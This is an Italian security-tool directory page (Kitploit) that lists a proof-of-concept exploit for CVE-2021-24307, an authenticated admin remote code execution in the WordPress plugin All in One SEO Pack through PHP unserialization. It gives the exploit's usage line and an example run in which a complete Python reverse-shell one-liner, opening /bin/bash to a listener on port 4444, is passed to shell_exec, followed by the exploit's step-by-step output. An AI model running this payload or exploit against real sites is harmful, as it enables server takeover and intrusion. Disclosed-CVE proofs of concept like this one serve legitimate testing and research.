Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-24307-all-in-one-seo-pack-admin-rce — Proof-of-concept exploit per CVE-2021-24307, una RCE da admin autenticato in All in One SEO Pack <= 4.1.0.1 tramite unserializzazione PHP, che consente l'esecuzione arbitraria di comandi. | Kitploit
Strumenti/GitHubGitHub/darkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubdarkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce

CVE-2021-24307-all-in-one-seo-pack-admin-rce

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Proof-of-concept exploit per CVE-2021-24307, una RCE da admin autenticato in All in One SEO Pack <= 4.1.0.1 tramite unserializzazione PHP, che consente l'esecuzione arbitraria di comandi.

Vedi Repository
424 anni faNon ancora revisionato
Condividi

RCE tramite unserialization PHP admin in All in one SEO pack (CVE-2021-24307)

Semplice PoC di una RCE autenticata da admin in AISEO <= 4.1.0.1 fornito come esempio.

Analisi completa qui: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/

Utilizzo:

root@kitploit:~
php exploit.php url login password php_command arguments [proxy]

Esempio:

root@kitploit:~
└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080

-- All-in-one-seo-pack <= 4.1.0.1 RCE autenticata da admin --
-- Exploit di Vincent MICHEL (@darkpills) --

[+] Autenticazione a wordpress http://wordpress/
[+] Recupero nonce WP REST API
[+] Nonce trovato: 6aeb9ddf05
[+] Generazione payload POST per eseguire il comando: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'")
[+] Caricamento file ini con le impostazioni di importazione
[+] Fatto! Controlla il risultato da qualche parte (esecuzione comandi cieca)
Scarica lo strumento